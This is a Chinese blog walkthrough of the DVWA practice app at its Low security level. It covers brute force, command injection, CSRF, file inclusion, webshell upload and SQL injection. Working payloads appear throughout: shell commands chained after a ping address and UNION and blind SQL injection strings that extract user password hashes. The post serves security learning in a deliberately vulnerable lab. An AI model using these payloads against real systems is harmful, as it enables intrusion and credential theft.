DVWA (Low)

最新推荐文章于 2022-04-29 15:02:43 发布
最新推荐文章于 2022-04-29 15:02:43 发布
阅读量375 收藏
点赞数
分类专栏: DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51075988/article/details/112911893
版权

DVWA (Low)

文章目录

Brute Force

查看源代码
在这里插入图片描述

方法一:sql注入

sql语句没有任何过滤,可进行sql注入
单独拿出sql语句进行对照
在这里插入图片描述
注入方式:在username一栏输入以下内容,使引号闭合

注释掉后面内容:忽略掉密码的正确性
admin '#    

or 语句:只要其中一个条件满足即可,密码设置为空
admin' or '1'='1
admin' or '1'='2

在这里插入图片描述

在这里插入图片描述

方法二:暴力破解

使用 Burp

开启代理,进行抓包,先随便输入一个密码
在这里插入图片描述设置需要爆破的字段
在这里插入图片描述选取字典
在这里插入图片描述设置线程
在这里插入图片描述查看,密码为password
在这里插入图片描述在这里插入图片描述

Command Injection

尝试 ping 127.0.0.1

出现乱码问题,查询资料解决
在这里插入图片描述

…/DVWA/dvwa/includes目录下,有个dvwaPage.inc.php文件,打开文件,将UTF-8改为GBK或者GB2312即可
在这里插入图片描述这样结果为

在这里插入图片描述查看源代码
在这里插入图片描述没有进行任何过滤,shell_exec()函数直接执行。
那我们可以

127.0.0.1&&whoami

在这里插入图片描述

127.0.0.1&&dir

在这里插入图片描述
或者使用 管道符 | 进行任何命令

|dir
|whoami

比如:

|echo 小子!>1.txt

可以发现
在这里插入图片描述

CSRF

查看源码
在这里插入图片描述就是一个简单的改密操作
我们尝试一下,更改密码为111
在这里插入图片描述可以发现可以在url中直接进行改密
在这里插入图片描述原理就是,图谋不轨的人可以制作一个html文件使用 img或者是a标签插入一条链接(与上图类似的改密操作),然后将这个链接放到受害者可能所兴趣的页面或者是不易被察觉的404错误之类的简单页面,发送给受害者。
那么当受害者点击进入该页面时,其密码就已经被篡改了而不自知。

File Inclusion

查看源码
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
没有任何过滤,并且可以发现点击每个文件后,其url中参数随之变化,那我们直接按照思路继续在url上进行操作,更改为4
在这里插入图片描述
再往后发现文件已经不存在了

在这里插入图片描述

File Upload

查看源码
在这里插入图片描述就是简单的修改文件路径至…/…/hackable/uploads/ ,但是并未对文件进行任何过滤,那么我们试试上传一句话木马吧!
在这里插入图片描述在这里插入图片描述上传成功
使用工具 中国蚁剑
在这里插入图片描述

SQL Injection

查看源码
在这里插入图片描述进行简单的查询然后通过while循环出所有结果

sql语句为

SELECT first_name, last_name FROM users WHERE user_id = '$id';'' or '1'='1'

进行注入

' or 1#
' or '1'='1

在这里插入图片描述查列

1' order by 1#
1' order by 2#
1' order by 3#

在这里插入图片描述在这里插入图片描述联合查询

-1' union select 1,2#

在这里插入图片描述都有回显

查库

-1' union select database(),2#

在这里插入图片描述查表

-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa')#

在这里插入图片描述
出现这样的问题,仔细检查过后发现sql语句没有问题,查询资料后发现是字符编码和排序规则的问题
解决方案:在sql语句中添加 COLLATE utf8_general_ci ,更改为:

-1' union select database(),(select group_concat(table_name) COLLATE utf8_general_ci from information_schema.tables where table_schema = 'dvwa')#

在这里插入图片描述查到表名为 guestbook,users,猜测用户信息存在于 users表中

查字段: 最好字段所在的表名以及库名都作为条件,进行筛选

-1' union select 1,(select group_concat(column_name) COLLATE utf8_general_ci from information_schema.columns where table_name = 'users' and table_schema = 'dvwa')#

在这里插入图片描述查到可能存在于 user,password 字段中

查字段信息

-1' union select 1,( select group_concat(concat_ws('~',user,password)) COLLATE utf8_general_ci  from users)#

在这里插入图片描述
经过md5解密之后获得密码为 password

SQL Injection (Blind)

查看源码
在这里插入图片描述判断是否为布尔型注入

1' and 1=1#

在这里插入图片描述

1' and 1=2#

在这里插入图片描述典型的当条件正确时,只会输出相同的一句话,是布尔型注入

判断数据库名长度: 尝试之后长度为4

1' and length(database()) = 4#

具体判断库名: 可使用Burp对变量进行爆破
也可以使用ascii()函数,substr()函数,这里使用left()函数即可满足

1' and left(database(),1) = 'd'#
1' and left(database(),2) = 'dv'#
1' and left(database(),3) = 'dvw'#
1' and left(database(),4) = 'dvwa'#

之后的 查表,查字段,查内容都是使用同样的方法。具体可参照 SQL 盲注

Weak Session IDs

配置
在这里插入图片描述查看源代码
在这里插入图片描述
在这里插入图片描述
使用Burp抓包

在这里插入图片描述在这里插入图片描述

每点击一次,dvwaSession的值增加1
我们使用另一个浏览器在未成功登录DVWA的情况下,进行
在这里插入图片描述执行后成功登录

执昔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA Installation
08-15
DVWA all package. DVWA-master.zip
DVWAlow利用思路
大白博客
12-23 543
DVWA: low Brute Force(暴力(破解))   BurpSuite爆破 Command Injection(命令行注入)      ‘IP地址’+‘&&’+‘任意代码’ CSRF(跨站请求伪造)      构造链接 http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=TooYo...
DVWAlow级别SQL Injection
Daniel的博客
09-14 875
输入1,返回正常,输入1‘ and ’1‘=’2,返回空,输入1‘ or 1234=1234 # 说明存在字符型注入。 然后猜解字段数,输入1‘ order by 1 #,返回正常,输入1’ order by 2 #,返回正常 输入1‘ order by 3 #,报错,说明只有两个字段,即First name、Surname。 确定显示的字段顺序 输入1′ unio
dvwa low级别前五测试
苟有恒,必有三更眠,五更起。
12-28 2816
摘要 本篇签到记录dvwa前五个漏洞的low级别测试过程和结果。顺便复习一下之前接触过的几个漏洞。 0x00 环境搭建 phpstudy+dvwa环境的搭建不难,这里就不详细说了,详细参照博客。 phpstudy下搭建dvwa 0x01 Brute Force(爆破) Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的
DVWA low难度全通关
小明师傅博客
06-08 684
low难度 1.暴力破解 抓包 破解成功 2.命令执行 我们可以用通道符绕过 | &&也行 3.跨站请求伪造 这里把url发给登陆了的用户,就可以密码修改成功了 4.文件包含 通过这样来访问到phpinfo.php 5.文件上传 毫无防备 可以直接上传 6.不安全验证码 由于国内无法访问 GOOGLE,这个模块就不试了 7.SQL注入 sqlmap跑起 8.布尔型SQL注入 sqlmap跑起 9.Weak Session Ids 当用户登陆后,在服务器端就会
DVWA教程(一) —— Low级别
weixin_47610939的博客
04-29 1678
本篇文章为各位正在学习DVWA提供解题思路,同时也是本人的学习笔记,本文中的方法仅为验证漏洞,并无攻击目的。DVWA安装,可以使用docker容器,非常简单方便,通过以下链接: Docker Hubhttps://hub.docker.com/r/sagikazarmark/dvwa 0x01. 暴力破解 0x02. 代码注入 先看题目,是一个ping命令 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get in...
DVWA漏洞平台学习之LOW级别
李熠专用博客_白帽子一枚,人称低危终结者
09-13 1330
在上一篇文章中,我们搭建了DVWA平台,本文开始,我将依次带你学习如何在DVWA平台上利用这些漏洞。 首先将DVWA的级别设置为LOW。 接下来,我们开始对每个漏洞进行复现。 0x00 Brute Force-暴力破解 漏洞利用 进入Brute Force页面, 要求输入用户名和密码,进行登录,在LOW级别下,没有做任何的防护,我们可以用BurpSuite进行暴力破解。(关于BurpSuit的使用,你可以自行百度或者关注本公众号后续的文章) 漏洞分析 0x01 Command Injection-命令注入
新手指南 DVWA low 低级别 介绍
weixin_44286136的博客
05-20 493
DVWA 有很多模块。如下所示 我们选中low,然后SuBmit 首先看目录 1.Brute Force(暴力破解) 2.Command Injection(命令行注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含) 5.File Upload(文件上传) 6.Insecure CAPTCHA (不安全的验证码) 7.SQL Injection(SQL注入) 8.SQL Injection(Blind)(SQL盲注) 9.XSS(Reflected)(反射型跨站脚本) 10.
DVWA初级(low)通关教程
weixin_52029251的博客
04-25 189
Brute Force(暴力破解) 抓包重发到Intruder 选择攻击模式为Cluster bomb,并选中输入的账号和密码 接下来暴力破解 接下来就是慢慢跑了 Command Injection(命令注入) 输入我的IP地址ping通之后有回显 查看源码发现没有将拼接符禁用 开始命令注入 成功! File Inclusion(文件包含漏洞) 点击file1.php ...
DVWA 暴力破解-Low
qq_44199135的博客
10-23 1589
DVWA 暴力破解-Low 登录DVWA 选择级别 选择Low级别,点击Brute Force然后登陆一下看看。 当出现Welcome to the password protected area admin代表你成功登录了。 检查环境 登陆成功以后不要急着去抓包暴力破解,继续检查环境,看看代理是否设置好了吗burpsuite工具配置成功了吗。我用的是火狐浏览器,可以在设置里面修改代理也可以使用FoxyProxy插件来设置代理,我这里使用的是浏览器设置里面的手动代理这样和本地代理相比不会影响其他浏
DVWA-2.0.1
09-23
在Github下载的DVWA 2.0.1,资源github上可找,如果所需下载积分超过1,那没必要。。。。.。。。。。。。
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
DVWA-master.zip
01-04
DVWA-master.zip
2014年311教育学专业基础综合答案解析.pdf
04-24
教育学考研,考研真题,全国硕士研究生统一考试教育学专业基础综合真题及解析,311历年真题,参考答案,答案解析。教育学统考。
大语言模型安全测试方法
04-24
4月16日联合国日内瓦总部万国宫,由世界数字技术院(WDTA)与云安全联盟大中华区(CSA GCR)联合主办第27届联合国科技大会AI边会上,世界数字技术院(WDTA)发布了两项具有重要意义的国际标准:“生成式人工智能应用安全测试标准”和“大语言模型安全测试方法”。这是国际组织首次在生成式AI应用安全、大模型安全领域发布国际标准,为业界提供了统一的测试框架,标准的发布将对人工智能领域产生深远影响,推动人工智能技术的安全、可靠发展。 这两大标准由云安全联盟大中华区研究院副院长黄连金带领的专家团队编制而成,他们来自CSA大中华区、OpenAI、蚂蚁集团、谷歌、微软、亚马逊、英伟达、OPPO、科大讯飞、百度、腾讯、加州大学伯克利分校、芝加哥大学、香港科技大学等数十家单位,体现了业界的广泛协作与集体智慧。 云安全联盟大中华区主席、世界数字技术院执行理事长李雨航院士发布时介绍,“生成式人工智能应用安全测试标准”为测试和验证生成式AI应用的安全性提供了一个框架,特别是那些使用大语言模型构建的应用程序。它定义了人工智能应用程序架构每一层的测试和验证范围,确保AI应用各个方面都经过严格的安全性和合规性
基于ssm电商网站的设计与实现(部署视频)_kaic.zip
04-24
目 录 目 录 1 绪论 1.1 研究背景 1.2 目的和意义 1.3 论文结构安排 2 相关技术 2.1 SSM框架介绍 2.2 B/S结构介绍 2.3 MYSQL数据库介绍 3 系统分析 3.1 系统可行性分析 3.1.1 技术可行性分析 3.1.2 经济可行性分析 3.1.3 运行可行性分析 3.2 系统性能分析 3.2.1 易用性指标 3.2.2 可扩展性指标 3.2.3 健壮性指标 3.2.4 安全性指标 3.3 系统流程分析 3.3.1 操作流程分析 3.3.2 登录流程分析 3.3.3 信息添加流程分析 3.3.4 信息删除流程分析 4 系统设计 4.1 系统概要设计 4.2 系统功能结构设计 4.3 数据库设计 4.3.1 数据库E-R图设计 4.3.2 数据库表结构设计 5 系统实现 5.1用户信息管理 5.2 商品信息管理 5.3商品分类管理 5.1商品资讯管理 6 系统测试 6.1 系统测试的特点  6.2 系统功能测试 6.2.1 登录功能测试 6.2.2 添加类别功能测试 6.3 测试结果分析 结 论 致 谢 参考文献
Comfast CF-924AC V3无线网卡驱动
最新发布
04-24
https://editor.csdn.net/md/?articleId=137978326文章对应USB 1300M无线网卡驱动,使用方式请参考博文。本驱动为博文对应的RDK X3平台所用,其它平台根据博文链接下载源码编译。
2024-2030全球与中国实时老化测试市场现状及未来发展趋势.docx
04-24
2024-2030全球与中国实时老化测试市场现状及未来发展趋势
fieldmeta基于springboot的字段元数据管理,通用代码生成框架.zip
04-24
springboot框架 一、Spring Boot基础应用 Spring Boot特征 概念: 约定优于配置,简单来说就是你所期待的配置与约定的配置一致,那么就可以不做任何配置,约定不符合期待时才需要对约定进行替换配置。 特征: 1. SpringBoot Starter:他将常用的依赖分组进行了整合,将其合并到一个依赖中,这样就可以一次性添加到项目的Maven或Gradle构建中。 2,使编码变得简单,SpringBoot采用 JavaConfig的方式对Spring进行配置,并且提供了大量的注解,极大的提高了工作效率,比如@Configuration和@bean注解结合,基于@Configuration完成类扫描,基于@bean注解把返回值注入IOC容器。 3.自动配置:SpringBoot的自动配置特性利用了Spring对条件化配置的支持,合理地推测应用所需的bean并自动化配置他们。 4.使部署变得简单,SpringBoot内置了三种Servlet容器,Tomcat,Jetty,undertow.我们只需要一个Java的运行环境就可以跑SpringBoot的项目了
dvwa low 超详细原理教学
06-10
DVWA有三个安全级别:低(low)、中等(medium)和高(high)。在低安全级别下,DVWA中存在以下漏洞: 1. Brute Force:通过弱密码猜测攻击登录系统。 2. Command Execution:通过输入特殊命令攻击服务器。 3. SQL ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值